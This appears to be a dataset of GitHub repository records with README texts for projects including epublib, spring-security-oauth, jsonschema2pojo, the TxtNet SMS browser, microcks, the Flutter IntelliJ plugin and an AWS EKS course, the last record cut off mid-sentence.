# epublib Epublib is a java library for reading/writing/manipulating epub files. It consists of 2 parts: a core that reads/writes epub and a collection of tools. The tools contain an epub cleanup tool, a tool to create epubs from html files, a tool to create an epub from an uncompress html file. It also contains a swing-based epub viewer. ![Epublib viewer](http://www.siegmann.nl/wp-content/uploads/Alice%E2%80%99s-Adventures-in-Wonderland_2011-01-30_18-17-30.png) The core runs both on android and a standard java environment. The tools run only on a standard java environment. This means that reading/writing epub files works on Android. ## Build status * Travis Build Status: [![Build Status](https://travis-ci.org/psiegman/epublib.svg?branch=master)](https://travis-ci.org/psiegman/epublib) ## Command line examples Set the author of an existing epub java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --author Tester,Joe Set the cover image of an existing epub java -jar epublib-3.0-SNAPSHOT.one-jar.jar --in input.epub --out result.epub --cover-image my_cover.jpg ## Creating an epub programmatically package nl.siegmann.epublib.examples; import java.io.InputStream; import java.io.FileOutputStream; import nl.siegmann.epublib.domain.Author; import nl.siegmann.epublib.domain.Book; import nl.siegmann.epublib.domain.Metadata; import nl.siegmann.epublib.domain.Resource; import nl.siegmann.epublib.domain.TOCReference; import nl.siegmann.epublib.epub.EpubWriter; public class Translator { private static InputStream getResource( String path ) { return Translator.class.getResourceAsStream( path ); } private static Resource getResource( String path, String href ) { return new Resource( getResource( path ), href ); } public static void main(String[] args) { try { // Create new Book Book book = new Book(); Metadata metadata = book.getMetadata(); // Set the title metadata.addTitle("Epublib test book 1"); // Add an Author metadata.addAuthor(new Author("Joe", "Tester")); // Set cover image book.setCoverImage( getResource("/book1/test_cover.png", "cover.png") ); // Add Chapter 1 book.addSection("Introduction", getResource("/book1/chapter1.html", "chapter1.html") ); // Add css file book.getResources().add( getResource("/book1/book1.css", "book1.css") ); // Add Chapter 2 TOCReference chapter2 = book.addSection( "Second Chapter", getResource("/book1/chapter2.html", "chapter2.html") ); // Add image used by Chapter 2 book.getResources().add( getResource("/book1/flowers_320x240.jpg", "flowers.jpg")); // Add Chapter2, Section 1 book.addSection(chapter2, "Chapter 2, section 1", getResource("/book1/chapter2_1.html", "chapter2_1.html")); // Add Chapter 3 book.addSection("Conclusion", getResource("/book1/chapter3.html", "chapter3.html")); // Create EpubWriter EpubWriter epubWriter = new EpubWriter(); // Write the Book as Epub epubWriter.write(book, new FileOutputStream("test1_book1.epub")); } catch (Exception e) { e.printStackTrace(); } } } ## Usage in Android Add the following lines to your `app` module's `build.gradle` file: repositories { maven { url 'https://github.com/psiegman/mvn-repo/raw/master/releases' } } dependencies { implementation('nl.siegmann.epublib:epublib-core:4.0') { exclude group: 'org.slf4j' exclude group: 'xmlpull' } implementation 'org.slf4j:slf4j-android:1.7.25' }
0
Baeldung/spring-security-oauth
Just Announced - Learn Spring Security OAuth": "
oauth spring-security spring-security-oauth
## Spring Security OAuth I've just announced a new course, dedicated on exploring the new OAuth2 stack in Spring Security 5 - Learn Spring Security OAuth: http://bit.ly/github-lsso </br></br></br> ## Build the Project ``` mvn clean install ``` ## Projects/Modules This project contains a number of modules, here is a quick description of what each module contains: - `oauth-rest` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack - `oauth-jwt` - Authorization Server (Keycloak), Resource Server and Angular App based on the new Spring Security 5 stack, focused on JWT support - `oauth-jws-jwk-legacy` - Authorization Server and Resource Server for JWS + JWK in a Spring Security OAuth2 Application - `oauth-legacy` - Authorization Server, Resource Server, Angular and AngularJS Apps for legacy Spring Security OAuth2 ## Run the Modules You can run any sub-module using command line: ``` mvn spring-boot:run ``` If you're using Spring STS, you can also import them and run them directly, via the Boot Dashboard You can then access the UI application - for example the module using the Password Grant - like this: `http://localhost:8084/` You can login using these credentials, username:john and password:123 ## Run the Angular 7 Modules - To run any of Angular7 front-end modules (_spring-security-oauth-ui-implicit-angular_ , _spring-security-oauth-ui-password-angular_ and _oauth-ui-authorization-code-angular_) , we need to build the app first: ``` mvn clean install ``` - Then we need to navigate to our Angular app directory: ``` cd src/main/resources ``` And run the command to download the dependencies: ``` npm install ``` - Finally, we will start our app: ``` npm start ``` - Note: Angular7 modules are commented out because these don't build on Jenkins as they need npm installed, but they build properly locally - Note for Angular version < 4.3.0: You should comment out the HttpClient and HttpClientModule import in app.module and app.service.ts. These version rely on the HttpModule. ## Using the JS-only SPA OAuth Client The main purpose of these projects are to analyze how OAuth should be carried out on Javascript-only Single-Page-Applications, using the authorization_code flow with PKCE. The *clients-SPA-legacy/clients-js-only-react-legacy* project includes a very simple Spring Boot Application serving a couple of separate Single-Page-Applications developed in React. It includes two pages: * a 'Step-By-Step' guide, where we analyze explicitly each step that we need to carry out to obtain an access token and request a secured resource * a 'Real Case' scenario, where we can log in, and obtain or use secured endpoints (provided by the Auth server and by a Custom server we set up) * the Article's Example Page, with the exact same code that is shown in the related article The Step-By-Step guide supports using different providers (Authorization Servers) by just adding (or uncommenting) the corresponding entries in the static/*spa*/js/configs.js. ### The 'Step-by-Step' OAuth Client with PKCE page After running the Spring Boot Application (a simple *mvn spring-boot:run* command will be enough), we can browse to *http://localhost:8080/pkce-stepbystep/index.html* and follow the steps to find out what it takes to obtain an access token using the Authorization Code with PKCE Flow. When prompted the login form, we might need to create a user for our Application first. ### The 'Real-Case' OAuth Client with PKCE page To use all the features contained in the *http://localhost:8080/pkce-realcase/index.html* page, we'll need to first start the resource server (clients-SPA-legacy/oauth-resource-server-auth0-legacy). In this page, we can: * List the resources in our resource server (public, no permissions needed) * Add resources (we're requested the permissions to do that when logging in. For simplicity sake, we just request the existing 'profile' scope) * Remove resources (we actually can't accomplish this task, because the resource server requires the application to have permissions that were not included in the existing scopes)
0
joelittlejohn/jsonschema2pojo
Generate Java types from JSON or JSON Schema and annotate those types for data-binding with Jackson, Gson, etc
ant-task gradle-plugin gson jackson java json json-schema maven-plugin
# jsonschema2pojo [![Build Status](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml/badge.svg?query=branch%3Amaster)](https://github.com/joelittlejohn/jsonschema2pojo/actions/workflows/ci.yml?query=branch%3Amaster) [![Maven Central](https://maven-badges.herokuapp.com/maven-central/org.jsonschema2pojo/jsonschema2pojo/badge.svg)](http://search.maven.org/#search%7Cga%7C1%7Cg%3A%22org.jsonschema2pojo%22) _jsonschema2pojo_ generates Java types from JSON Schema (or example JSON) and can annotate those types for data-binding with Jackson 2.x or Gson. ### [Try jsonschema2pojo online](http://jsonschema2pojo.org/)<br>or `brew install jsonschema2pojo` You can use jsonschema2pojo as a Maven plugin, an Ant task, a command line utility, a Gradle plugin or embedded within your own Java app. The [Getting Started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started) guide will show you how. A very simple Maven example: ```xml <plugin> <groupId>org.jsonschema2pojo</groupId> <artifactId>jsonschema2pojo-maven-plugin</artifactId> <version>1.2.1</version> <configuration> <sourceDirectory>${basedir}/src/main/resources/schema</sourceDirectory> <targetPackage>com.example.types</targetPackage> </configuration> <executions> <execution> <goals> <goal>generate</goal> </goals> </execution> </executions> </plugin> ``` A very simple Gradle example: ```groovy plugins { id "java" id "org.jsonschema2pojo" version "1.2.1" } repositories { mavenCentral() } dependencies { implementation 'com.fasterxml.jackson.core:jackson-databind:2.15.2' } jsonSchema2Pojo { targetPackage = 'com.example' } ``` Useful pages: * **[Getting started](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Getting-Started)** * **[How to contribute](https://github.com/joelittlejohn/jsonschema2pojo/blob/master/CONTRIBUTING.md)** * [Reference](https://github.com/joelittlejohn/jsonschema2pojo/wiki/Reference) * [Latest Javadocs](https://joelittlejohn.github.io/jsonschema2pojo/javadocs/1.2.1/) * [Documentation for the Maven plugin](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/generate-mojo.html) * [Documentation for the Gradle plugin](https://github.com/joelittlejohn/jsonschema2pojo/tree/master/jsonschema2pojo-gradle-plugin#usage) * [Documentation for the Ant task](https://joelittlejohn.github.io/jsonschema2pojo/site/1.2.1/Jsonschema2PojoTask.html) Project resources: * [Downloads](https://github.com/joelittlejohn/jsonschema2pojo/releases) * [Mailing list](https://groups.google.com/forum/#!forum/jsonschema2pojo-users) Special thanks: * unkish * Thach Hoang * Dan Cruver * Ben Manes * Sam Duke * Duane Zamrok * Christian Trimble * YourKit, who support this project through a free license for the [YourKit Java Profiler](https://www.yourkit.com/java/profiler). Licensed under the [Apache License, Version 2.0](http://www.apache.org/licenses/LICENSE-2.0).
0
lukeaschenbrenner/TxtNet-Browser
An app that lets you browse the web over SMS
null
# TxtNet Browser ### Browse the Web over SMS, no WiFi or Mobile Data required! <p align="center"><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/app/src/main/ic_launcher-playstore.png" alt="App Icon" width="200"/></p> > **⏸️ Development of this project is currently on hiatus due to other ongoing commitments. However, fixes and improvements are planned when development continues in Q1 2024! ⏸️** TextNet Browser is an Android app that allows anyone around the world to browse the web without a mobile data connection! It uses SMS as a medium of transmitting HTTP requests to a server where a pre-parsed HTML response is compressed using Google's [Brotli](https://github.com/google/brotli) compression algorithm and encoded using a custom Base-114 encoding format (based on [Basest](https://github.com/saxbophone/basest-python)). In addition, any user can act as a server using their own phone's primary phone number and a Wi-Fi/data connection at the press of a button, allowing for peer-to-peer distributed networks. ## Download ### See the **[releases page](https://github.com/lukeaschenbrenner/TxtNet-Browser/releases)** for an APK download of the TxtNet Browser client. A Google Play release is coming soon. TxtNet Browser is currently compatible with Android 4.4-13+. ## Running Server Instances (uptime not guaranteed) | Country | Phone Number | Notes | | :--- | :----: | :--- | | United States | +1(913)203-2719 | Supports SMS to all +1 (US/Canada) numbers in addition to [these countries](https://github.com/lukeaschenbrenner/TxtNet-Browser/issues/2#issuecomment-1510506701) | | | | | Let me know if you are interested in hosting a server instance for your area! > ⚠️**Please note**: All web traffic should be considered unencrypted, as all requests are made over SMS and received in plaintext by the server! ## How it works (client) This app uses a permission that allows a broadcast reciever to recieve and parse incoming SMS messages without the need for the app to be registered as the user's default messaging app. While granting an app SMS permissions poses a security concern, the code for this app is open source and all code involving the use of internet permissions are compartamentalized to the server module. This ensures that unless the app is setup to be a server, no internet traffic is transmitted. In addition, as the client, SMS messages are only programatically sent to and recieved from a registered server phone number. The app communicates with a "server phone number", which is a phone number controlled by a "server host" that communicates directly over SMS using Android's SMS APIs. Each URL request is sent, encoded in a custom base 114, to the server. Usually, this only requires 1 SMS, but just in case, each message is prepended with an order specifier. When the server receives a request, the server uses an Android WebView component to programatically request the website in a manner that simulates a regular request, to avoid restrictions some services (such as Cloudflare) place on HTTP clients. By doing this, any Javascript can also execute on the website, allowing content to be dynamically loaded into the HTML if needed. Once the page is loaded, only the HTML is transferred back to the recipient device. The HTML is stripped of unnecessary tags and attributes, compressed into raw bytes, and then encoded. Once encoded, the messages are split into 160 character numbered segments (maximizing the [GSM-7 standard](https://en.wikipedia.org/wiki/GSM_03.38) SMS size) and sent to the client app for parsing and displaying. Side note: Compression savings have been estimated to be an average of 20% using Brotli, but oftentimes it can save much more! For example, the website `example.com` in stripped HTML is 285 characters, but only requires 2 SMS messages (189 characters) to receive. Even including the 225% overhead in data transmission, it is still more efficient! #### Why encode the HTML in the first place? SMS was created in 1984, and was created to utilize the extra bytes from the data channels in phone signalling. It was originally conceived to only support 128 characters in a 7-bit alphabet. When further characters were required to support a subset of the UTF-8 character set, a new standard called UCS-2 was created. Still limited by the 160 bytes available, UCS-2 supports more characters (many of which show up in HTML documents) but limits SMS sizes to 70 characters per SMS. By encoding all data in GSM-7, more data can be sent per SMS message than sending the raw HTML over SMS. It is possible that it may be even more efficient to create an encoding system using all the characters available in UCS-2, but this limits compatibility and is out of the scope of the project. ## Server Hosting TxtNet Browser has been rewritten to include a built-in server hosting option inside the app. Instead of the now-deprecated Python server using a paid SMS API, any user can now act as a server host, allowing for distributed communication. To enable the background service, tap on the overflow menu and select "TxtNet Server Hosting". Once the necessary permissions are granted, you can press on the "Start Service" toggle to initialize a background service. TxtNet Server uses your primary mobile number associated with the active carrier subscription SIM as a number that others can add and connect to. Please note that this feature is still in early stages of development and likely has many issues. Please submit issue reports for any problems you encounter. For Android 4.4-6.0, you will need to run adb commands one time as specified in the app. For Android 6.0-10.0, you may also use Skizuku, but a PC will still be required once. For Android 11+, no PC is required to activate the server using [Shizuku](https://shizuku.rikka.app/guide/setup/). ##### Desktop Server Installation (Deprecated) <strike> The current source code is pointed at my own server, using a Twilio API with credits I have purchased. If you would like to run your own server, follow the instructions below: 1. Register for an account at [Twilio](https://twilio.com/), purchase a toll-free number with SMS capability, and purchase credits. (This project will not work with Twilio free accounts) 2. Create a Twilio application for the number. 3. Sign up for an [ngrok](http://ngrok.com/) account and download the ngrok application 4. Open the ngrok directory and run this command: `./ngrok tcp 5000` 5. Visit the [active numbers](https://console.twilio.com/US1/develop/phone-numbers/manage/incoming) page and add the ngrok url to the "A Message Comes In" section after selecting "webhook". For example: "https://xyz.ngrok.io/receive_sms" 6. Download the TxtNet Browser [server script](https://github.com/lukeaschenbrenner/TxtNet-Browser/blob/master/SMS_Server_Twilio.py) and install all the required modules using "pip install x" 7. Add your Twilio API ID and Key into your environment variables, and run the script! `python3 ./SMS_Server_Twilio.py` 8. In the TxtNet Browser app, press the three dots and press "Change Server Phone Number". Enter in the phone number you purchased from Twilio and press OK! </strike> ## FAQ/Troubleshooting Bugs: - Many carriers are unnecessarily rate limiting incoming text messages, so a page may look as though it "stalled" while loading on large pages. As of now the only way to fix this is to wait! - In congested networks, it's possible for a mobile carrier to drop one or more SMS messages before they are recieved by the client. Currently, the app has no logic to mitigate this issue, so any websites that have stalled for a significant amount of time should be requested again. - In Android 12 (or possibly a new version of Google Messages?), there is a new and "improved" messages blocking feature. This results in no SMS messages getting through when a number is blocked, which makes the blocking feature of TxtNet Browser break the app! Instead of blocking messages, to get around this "feature", you can silent message notifications from the server phone number. <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/silentMessages.png" alt="Silence Number" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/Messages_Migrating_Popup.png" alt="Contacts Popup" width="200"/> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/MigratingBlockedContacts.png" alt="Migrating Contacts" width="200"/> ## Screenshots (TxtNet 1.0) <table> <tr> <td> <img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot1.png" alt="1" height = 640px ></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot2.png" alt="2" height = 640px></td> </tr> <tr> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot3.png" alt="3" height = 640px></td> <td><img src="https://github.com/lukeaschenbrenner/TxtNet-Browser/raw/master/media/screenshot4.png" align="right" alt="4" height = 640px> </td> </tr> </table> ##### Demo (TxtNet 1.0) https://user-images.githubusercontent.com/5207700/191133921-ee39c87a-c817-4dde-b522-cb52e7bf793b.mp4 > Demo video shown above ## Development ### 🚧 **If you are skilled in Android UI design, your help would be greatly appreciated!** 🚧 A consistent theme and dark mode would be great additions to this app. Feel free to submit pull requests! I am a second-year CS student with basic knowledge of Android Development and Server Development, and greatly appreciate help and support from the community. ## Future Impact My long-term goal with this project is to eventually reach communities where such a service would be practically useful, which may include: - Those in countries with a low median income and prohibitively expensive data plans - Those who live under oppressive governments, with near impenetrable internet censorship If you think you might be able to help funding a local country code phone number or server, or have any other ideas, please get in contact with the email in my profile description! ## License GPLv3 - See LICENSE.md ## Credits Thank you to everyone who has contributed to the libraries used by this app, especially Brotli and Basest. Special thanks goes to [Coldsauce](https://github.com/ColdSauce), whose original project [Cosmos Browser](https://github.com/ColdSauce/CosmosBrowserAndroid) was the original inspiration for this project! My original reply to his Hacker News comment is [here](https://news.ycombinator.com/item?id=30685223#30687202). In addition, I would like to thank [Zachary Wander](https://www.xda-developers.com/implementing-shizuku/) from XDA for their excellent Shizuku implementation tutorial and [Aayush Atharva](https://github.com/hyperxpro/Brotli4j/) for the amazing foundation they created with Brotli4J, allowing for a streamlined forking process to create the library BrotliDroid used in this app.
0
microcks/microcks
Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀
api api-testing asyncapi asyncapi-specification cncf cncf-project event-driven graphql kubernetes mock mock-server mocking openapi openapi-tooling openapi3 openapi31 postman-collection swagger swagger2 testing
<img src="./microcks-banner.png" width="600"> [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) [![Container](https://img.shields.io/badge/dynamic/json?color=blueviolet&logo=docker&style=for-the-badge&label=Quay.io&query=tags[0].name&url=https://quay.io/api/v1/repository/microcks/microcks/tag/?limit=10&page=1&onlyActiveTags=true)](https://quay.io/repository/microcks/microcks?tab=tags) [![Version](https://img.shields.io/maven-central/v/io.github.microcks/microcks?color=blue&style=for-the-badge)]((https://search.maven.org/artifact/io.github.microcks/microcks)) [![License](https://img.shields.io/github/license/microcks/microcks?style=for-the-badge&logo=apache)](https://www.apache.org/licenses/LICENSE-2.0) [![Project Chat](https://img.shields.io/badge/discord-microcks-pink.svg?color=7289da&style=for-the-badge&logo=discord)](https://microcks.io/discord-invite/) # Microcks - Kubernetes native tool for API Mocking & Testing Microcks is a platform for turning your API and microservices assets - *OpenAPI specs*, *AsyncAPI specs*, *gRPC protobuf*, *GraphQL schema*, *Postman collections*, *SoapUI projects* - into live mocks in seconds. It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with *Jenkins*, *GitHub Actions*, *Tekton* and many others through a simple CLI. ## Getting Started * [Documentation](https://microcks.io/documentation/getting-started/) To get involved with our community, please make sure you are familiar with the project's [Code of Conduct](./CODE_OF_CONDUCT.md). ## Build Status The current development version is `1.9.1-SNAPSHOT`. [![GitHub Workflow Status](https://img.shields.io/github/actions/workflow/status/microcks/microcks/build-verify.yml?branch=1.9.x&logo=github&style=for-the-badge)](https://github.com/microcks/microcks/actions) #### Sonarcloud Quality metrics [![Code Smells](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=code_smells)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Reliability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=reliability_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Bugs](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=bugs)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Coverage](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=coverage)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Technical Debt](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_index)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Security Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=security_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) [![Maintainability Rating](https://sonarcloud.io/api/project_badges/measure?project=microcks_microcks&metric=sqale_rating)](https://sonarcloud.io/summary/new_code?id=microcks_microcks) ## Versions Here are the naming conventions we're using for current releases, ongoing development maintenance activities. | Status | Version | Branch | Container images tags | | ----------- |------------------|----------|----------------------------------| | Stable | `1.9.0` | `master` | `1.9.0`, `1.9.0-fix-2`, `latest` | | Dev | `1.9.1-SNAPSHOT` | `1.9.x` | `nightly` | | Maintenance | `1.8.2-SNAPSHOT` | `1.8.x` | `maintenance` | ## How to build Microcks The build instructions are available in the [contribution guide](CONTRIBUTING.md). ## Thanks to community! [![Stargazers repo roster for @microcks/microcks](http://reporoster.com/stars/microcks/microcks)](http://github.com/microcks/microcks/stargazers) [![Forkers repo roster for @microcks/microcks](http://reporoster.com/forks/microcks/microcks)](http://github.com/microcks/microcks/network/members)
0
flutter/flutter-intellij
Flutter Plugin for IntelliJ
flutter intellij-plugin java
# <img src="https://github.com/dart-lang/site-shared/blob/master/src/_assets/image/flutter/icon/64.png?raw=1" alt="Flutter" width="26" height="26"/> Flutter Plugin for IntelliJ [![Latest plugin version](https://img.shields.io/jetbrains/plugin/v/9212)](https://plugins.jetbrains.com/plugin/9212-flutter) [![Build Status](https://travis-ci.org/flutter/flutter-intellij.svg)](https://travis-ci.org/flutter/flutter-intellij) An IntelliJ plugin for [Flutter](https://flutter.dev/) development. Flutter is a multi-platform app SDK to help developers and designers build modern apps for iOS, Android and the web. ## Documentation - [flutter.dev](https://flutter.dev) - [Installing Flutter](https://flutter.dev/docs/get-started/install) - [Getting Started with IntelliJ](https://flutter.dev/docs/development/tools/ide) ## Fast development Flutter's <em>hot reload</em> helps you quickly and easily experiment, build UIs, add features, and fix bugs faster. Experience sub-second reload times, without losing state, on emulators, simulators, and hardware for iOS and Android. <img src="https://user-images.githubusercontent.com/919717/28131204-0f8c3cda-66ee-11e7-9428-6a0513eac75d.gif" alt="Make a change in your code, and your app is changed instantly."> ## Quick-start A brief summary of the [getting started guide](https://flutter.dev/docs/development/tools/ide): - install the [Flutter SDK](https://flutter.dev/docs/get-started/install) - run `flutter doctor` from the command line to verify your installation - ensure you have a supported IntelliJ development environment; either: - the latest stable version of [IntelliJ](https://www.jetbrains.com/idea/download), Community or Ultimate Edition (EAP versions are not always supported) - the latest stable version of [Android Studio](https://developer.android.com/studio) (note: Android Studio Canary versions are generally _not_ supported) - open the plugin preferences - `Preferences > Plugins` on macOS, `File > Settings > Plugins` on Linux, select "Browse repositories…" - search for and install the 'Flutter' plugin - choose the option to restart IntelliJ - configure the Flutter SDK setting - `Preferences` on macOS, `File>Settings` on Linux, select `Languages & Frameworks > Flutter`, and set the path to the root of your flutter repo ## Filing issues Please use our [issue tracker](https://github.com/flutter/flutter-intellij/issues) for Flutter IntelliJ issues. - for more general Flutter issues, you should prefer to use the Flutter [issue tracker](https://github.com/flutter/flutter/issues) - for more Dart IntelliJ related issues, you can use JetBrains' [YouTrack tracker](https://youtrack.jetbrains.com/issues?q=%23Dart%20%23Unresolved%20) ## Known issues Please note the following known issues: - [#601](https://github.com/flutter/flutter-intellij/issues/601): IntelliJ will read the PATH variable just once on startup. Thus, if you change PATH later to include the Flutter SDK path, this will not have an affect in IntelliJ until you restart the IDE. - If you require network access to go through proxy settings, you will need to set the `https_proxy` variable in your environment as described in the [pub docs](https://dart.dev/tools/pub/troubleshoot#pub-get-fails-from-behind-a-corporate-firewall). (See also: [#2914](https://github.com/flutter/flutter-intellij/issues/2914).) ## Dev Channel If you like getting new features as soon as they've been added to the code then you might want to try out the dev channel. It is updated weekly with the latest contents from the "master" branch. It has minimal testing. Set up instructions are in the wiki's [dev channel page](https://github.com/flutter/flutter-intellij/wiki/Dev-Channel).
0
stacksimplify/aws-eks-kubernetes-masterclass
AWS EKS Kubernetes - Masterclass | DevOps, Microservices
aws-alb aws-alb-ingress-controller aws-cloudwatch aws-codebuild aws-codecommit aws-codepipeline aws-ebs aws-eks aws-eks-cluster aws-fargate aws-rds docker fluentd kubernetes kubernetes-deployment kubernetes-pods kubernetes-secrets kubernetes-services yaml
# AWS EKS - Elastic Kubernetes Service - Masterclass [![Image](https://stacksimplify.com/course-images/AWS-EKS-Kubernetes-Masterclass-DevOps-Microservices-course.png "AWS EKS Kubernetes - Masterclass")](https://www.udemy.com/course/aws-eks-kubernetes-masterclass-devops-microservices/?referralCode=257C9AD5B5AF8D12D1E1) ## Course Modules | S.No | AWS Service Name | | ---- | ---------------- | | 1. | Create AWS EKS Cluster using eksctl CLI | | 2. | [Docker Fundamentals](https://github.com/stacksimplify/docker-fundamentals) | | 3. | [Kubernetes Fundamentals](https://github.com/stacksimplify/kubernetes-fundamentals) | | 4. | EKS Storage with AWS EBS CSI Driver | | 5. | Kubernetes Important Concepts for Application Deployments | | 5.1 | Kubernetes - Secrets | | 5.2 | Kubernetes - Init Containers | | 5.3 | Kubernetes - Liveness & Readiness Probes | | 5.4 | Kubernetes - Requests & Limits | | 5.5 | Kubernetes - Namespaces, Limit Range and Resource Quota | | 6. | EKS Storage with AWS RDS MySQL Database | | 7. | Load Balancing using CLB & NLB | | 7.1 | Load Balancing using CLB - AWS Classic Load Balancer | | 7.2 | Load Balancing using NLB - AWS Network Load Balancer | | 8. | Load Balancing using ALB - AWS Application Load Balancer | | 8.1 | ALB Ingress Controller - Install | | 8.2 | ALB Ingress - Basics | | 8.3 | ALB Ingress - Context path based routing | | 8.4 | ALB Ingress - SSL | | 8.5 | ALB Ingress - SSL Redirect HTTP to HTTPS | | 8.6 | ALB Ingress - External DNS | | 9. | Deploy Kubernetes workloads on AWS Fargate Serverless | | 9.1 | AWS Fargate Profiles - Basic | | 9.2 | AWS Fargate Profiles - Advanced using YAML | | 10. | Build and Push Container to AWS ECR and use that in EKS | | 11. | DevOps with AWS Developer Tools CodeCommit, CodeBuild and CodePipeline | | 12. | Microservices Deployment on EKS - Service Discovery | | 13. | Microservices Distributed Tracing using AWS X-Ray | | 14. | Microservices Canary Deployments | | 15. | EKS HPA - Horizontal Pod Autosaler | | 16. | EKS VPA - Vertical Pod Autosaler | | 17. | EKS CA - Cluster Autosaler | | 18. | EKS Monitoring using CloudWatch Agent & Fluentd - Container Insights | ## AWS Services Covered | S.No | AWS Service Name | | ---- | ---------------- | | 1. | AWS EKS - Elastic Kubernetes Service | | 2. | AWS EBS - Elastic Block Store | | 3. | AWS RDS - Relational Database Service MySQL | | 4. | AWS CLB - Classic Load Balancer | | 5. | AWS NLB - Network Load Balancer | | 6. | AWS ALB - Application Load Balancer | | 7. | AWS Fargate - Serverless | | 8. | AWS ECR - Elastic Container Registry | | 9. | AWS Developer Tool - CodeCommit | | 10. | AWS Developer Tool - CodeBuild | | 11. | AWS Developer Tool - CodePipeline | | 12. | AWS X-Ray | | 13. | AWS CloudWatch - Container Insights | | 14. | AWS CloudWatch - Log Groups & Log Insights | | 15. | AWS CloudWatch - Alarms | | 16. | AWS Route53 | | 17. | AWS Certificate Manager | | 18. | EKS CLI - eksctl | ## Kubernetes Concepts Covered | S.No | Kubernetes Concept Name | | ---- | ------------------- | | 1. | Kubernetes Architecture | | 2. | Pods | | 3. | ReplicaSets | | 4. | Deployments | | 5. | Services - Node Port Service | | 6. | Services - Cluster IP Service | | 7. | Services - External Name Service | | 8. | Services - Ingress Service | | 9. | Services - Ingress SSL & SSL Redirect | | 10. | Services - Ingress & External DNS | | 11. | Imperative - with kubectl | | 12. | Declarative - Declarative with YAML | | 13. | Secrets | | 14. | Init Containers | | 15. | Liveness & Readiness Probes | | 16. | Requests & Limits | | 17. | Namespaces - Imperative | | 18. | Namespaces - Limit Range | | 19. | Namespaces - Resource Quota | | 20. | Storage Classes | | 21. | Persistent Volumes | | 22. | Persistent Volume Claims | | 23. | Services - Load Balancers | | 24. | Annotations | | 25. | Canary Deployments | | 26. | HPA - Horizontal Pod Autoscaler | | 27. | VPA - Vertical Pod Autoscaler | | 28. | CA - Cluster Autoscaler | | 29. | DaemonSets | | 30. | DaemonSets - Fluentd for logs | | 31. | Config Maps | ## List of Docker Images on Docker Hub | Application Name | Docker Image Name | | ----------------- | ----------------- | | Simple Nginx V1 | stacksimplify/kubenginx:1.0.0 | | Spring Boot Hello World API | stacksimplify/kube-helloworld:1.0.0 | | Simple Nginx V2 | stacksimplify/kubenginx:2.0.0 | | Simple Nginx V3 | stacksimplify/kubenginx:3.0.0 | | Simple Nginx V4 | stacksimplify/kubenginx:4.0.0 | | Backend Application | stacksimplify/kube-helloworld:1.0.0 | | Frontend Application | stacksimplify/kube-frontend-nginx:1.0.0 | | Kube Nginx App1 | stacksimplify/kube-nginxapp1:1.0.0 | | Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 | | Kube Nginx App2 | stacksimplify/kube-nginxapp2:1.0.0 | | User Management Microservice with MySQLDB | stacksimplify/kube-usermanagement-microservice:1.0.0 | | User Management Microservice with H2 DB | stacksimplify/kube-usermanagement-microservice:2.0.0-H2DB | | User Management Microservice with MySQL DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:3.0.0-AWS-XRay-MySQLDB | | User Management Microservice with H2 DB and AWS X-Ray | stacksimplify/kube-usermanagement-microservice:4.0.0-AWS-XRay-H2DB | | Notification Microservice V1 | stacksimplify/kube-notifications-microservice:1.0.0 | | Notification Microservice V2 | stacksimplify/kube-notifications-microservice:2.0.0 | | Notification Microservice V1 with AWS X-Ray | stacksimplify/kube-notifications-microservice:3.0.0-AWS-XRay | | Notification Microservice V2 with AWS X-Ray | stacksimplify/kube-notifications-microservice:4.0.0-AWS-XRay | ## List of Docker Images you build in AWS ECR | Application Name | Docker Image Name | | ----------------- | ----------------- | | AWS Elastic Container Registry | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/aws-ecr-kubenginx:DATETIME-REPOID | | DevOps Usecase | YOUR-AWS-ACCOUNT-ID.dkr.ecr.us-east-1.amazonaws.com/eks-devops-nginx:DATETIME-REPOID | ## Sample Applications - User Management Microservice - Notification Miroservice - Nginx Applications ## What will students learn in your course? - You will write kubernetes manifests with confidence after going through live template writing sections - You will learn 30+ kubernetes concepts and use 18 AWS Services in combination with EKS - You will learn Kubernetes Fundamentals in both imperative and declarative approaches - You will learn writing & deploying k8s manifests for storage concepts like storage class, persistent volume claim pvc, mysql and EBS CSI Driver - You will learn to switch from native EBS Storage to RDS Database using k8s external name service - You will learn writing and deploying load balancer k8s manifests for Classic and Network load balancers - You will learn writing ingress k8s manifests by enabling features like context path based routing, SSL, SSL Redirect and External DNS. - You will learn writing k8s manifests for advanced fargate profiles and do mixed mode workload deployments in both EC2 and Fargate Serverless - You will learn using ECR - Elastic Container Registry in combination with EKS. - You will implement DevOps concepts with 